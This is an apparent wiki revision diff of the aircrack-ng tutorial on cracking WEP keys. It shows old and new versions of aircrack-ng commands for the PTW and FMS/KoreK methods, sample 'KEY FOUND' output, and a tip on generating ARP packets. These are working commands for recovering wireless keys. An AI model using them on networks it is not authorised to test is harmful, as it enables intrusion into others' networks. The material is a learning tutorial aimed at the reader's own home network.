-Two methods will be shown. ​ It is recommended you try both for learning purposes. ​ By trying both methods, you will see quickly the PTW method successfully determines the WEP key compared to the FMS/Korek method. ​ As a reminder, the PTW method only works successfully with arp request/​reply packets. ​ Since this tutorial covers injection ​arp request packets, you can properly use this method. ​ The other requirement is that you capture the full packet with airodump-ng. ​ Meaning, do not use the "- -ivs" option.+Two methods will be shown. ​ It is recommended you try both for learning purposes. ​ By trying both methods, you will see quickly the PTW method successfully determines the WEP key compared to the FMS/Korek method. ​ As a reminder, the PTW method only works successfully with arp request/​reply packets. ​ Since this tutorial covers injection ​of ARP request packets, you can properly use this method. ​ The other requirement is that you capture the full packet with airodump-ng. ​ Meaning, do not use the "-''''​-ivs" option.
  
 Start another console session and enter: Start another console session and enter:
  
-   ​aircrack-ng ​-z -b 00:​14:​6C:​7E:​40:​80 output*.cap+   ​aircrack-ng -b 00:​14:​6C:​7E:​40:​80 output*.cap
  
 Where: Where:
-  * -z invokes the PTW WEP-cracking method. 
   * -b 00:​14:​6C:​7E:​40:​80 selects the one access point we are interested in.  This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.   * -b 00:​14:​6C:​7E:​40:​80 selects the one access point we are interested in.  This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
   * output*.cap selects all files starting with "​output"​ and ending in "​.cap"​.   * output*.cap selects all files starting with "​output"​ and ending in "​.cap"​.
Line 532: Line 297:
 To also use the FMS/Korek method, start another console session and enter: To also use the FMS/Korek method, start another console session and enter:
  
-   ​aircrack-ng -b 00:​14:​6C:​7E:​40:​80 output*.cap+   ​aircrack-ng ​-K -b 00:​14:​6C:​7E:​40:​80 output*.cap
  
 Where: Where:
 +  * -K invokes the FMS/Korek method
   * -b 00:​14:​6C:​7E:​40:​80 selects the one access point we are interested in.  This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.   * -b 00:​14:​6C:​7E:​40:​80 selects the one access point we are interested in.  This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
   * output*.cap selects all files starting with "​output"​ and ending in "​.cap"​.   * output*.cap selects all files starting with "​output"​ and ending in "​.cap"​.
  
-You can run this while generating packets. ​ In a short time, the WEP key will be calculated and presented. ​  Using the PTW method40-bit WEP can be cracked with as few as 20,​000 ​data packets ​and 104-bit WEP with 40,​000 ​data packets. ​ These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.+If you are using 1.0-rc1, add the option "​-K"​ for the FMS/KoreK attack. (1.0-rc1 defaults to PTW.) 
 + 
 +You can run this while generating packets. ​ In a short time, the WEP key will be calculated and presented. ​ You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys.  If you are using the PTW attackthen you will need about 20,000 packets ​for 64-bit and 40,​000 ​to 85,​000 ​packets ​for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.
  
 Here is what success looks like: Here is what success looks like:
  
                                                 Aircrack-ng 0.9                                                 Aircrack-ng 0.9
-    
-                                [00:01:18] Tested 0/140000 keys (got 30680 IVs) 
-    
-   ​KB ​   depth   ​byte(vote) 
-    0    0/  1   12( 170) 35( 152) AA( 146) 17( 145) 86( 143) F0( 143) AE( 142) C5( 142) D4( 142) 50( 140)  
-    1    0/  1   34( 163) BB( 160) CF( 147) 59( 146) 39( 143) 47( 142) 42( 139) 3D( 137) 7F( 137) 18( 136)  
-    2    0/  1   56( 162) E9( 147) 1E( 146) 32( 146) 6E( 145) 79( 143) E7( 142) EB( 142) 75( 141) 31( 140)  
-    3    0/  1   78( 158) 13( 156) 01( 152) 5F( 151) 28( 149) 59( 145) FC( 145) 7E( 143) 76( 142) 92( 142)  
-    4    0/  1   90( 183) 8B( 156) D7( 148) E0( 146) 18( 145) 33( 145) 96( 144) 2B( 143) 88( 143) 41( 141)  
-    
-                         KEY FOUND! [ 12:​34:​56:​78:​90 ]  
-        Decrypted correctly: 100% 
- 
-To also use the FMS/Korek method, start another console session and enter: 
- 
-   ​aircrack-ng -b 00:​14:​6C:​7E:​40:​80 output*.cap 
- 
-Where: 
-  * -b 00:​14:​6C:​7E:​40:​80 selects the one access point we are interested in.  This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP. 
-  * output*.cap selects all files starting with "​output"​ and ending in "​.cap"​. 
- 
-You can run this while generating packets. ​ In a short time, the WEP key will be calculated and presented. ​  You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys.   These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key. 
- 
-Here is what success looks like: 
- 
-                                                Aircrack-ng 0.8 
        
        
Line 582: Line 324:
         Probability:​ 100%         Probability:​ 100%
  
-Notice that in this case it took far less then the estimated 250,000 IVs to crack the key.+Notice that in this case it took far less then the estimated 250,000 IVs to crack the key. (For this example, the FMS/KoreK attack was used.)
  
  
Line 589: Line 331:
   * Be sure to read all the documentation on the Wiki for the various commands used in this tutorial.   * Be sure to read all the documentation on the Wiki for the various commands used in this tutorial.
   * See [[i_am_injecting_but_the_ivs_don_t_increase|Tutorial:​ I am injecting but the IVs don't increase]]   * See [[i_am_injecting_but_the_ivs_don_t_increase|Tutorial:​ I am injecting but the IVs don't increase]]
 +
 +
 +===== Generating ARPs =====
 +
 +In order for this tutorial to work, you must receive at least one ARP packet. ​ On your home network, here is an easy way to generate an ARP packet. ​ On a wired or wireless PC, ping a non-existent IP on your home LAN.  A wired PC means a PC connected to your LAN via an ethernet cable. ​ Lets say your home LAN  address space is 192.168.1.1 through 192.168.1.254. ​ Pick an IP between 1 and 254 which is not assigned to a network device. ​ For example, if the IP 192.168.1.213 is not being used then "ping 192.168.1.213"​. ​ This will cause an ARP to be broadcast via your wireless access point and in turn, this will kick off the reinjection of packets by aireplay-ng.
  
simple_wep_crack.1179348819.txt.gz · Last modified: 2007/05/16 22:53 by darkaudax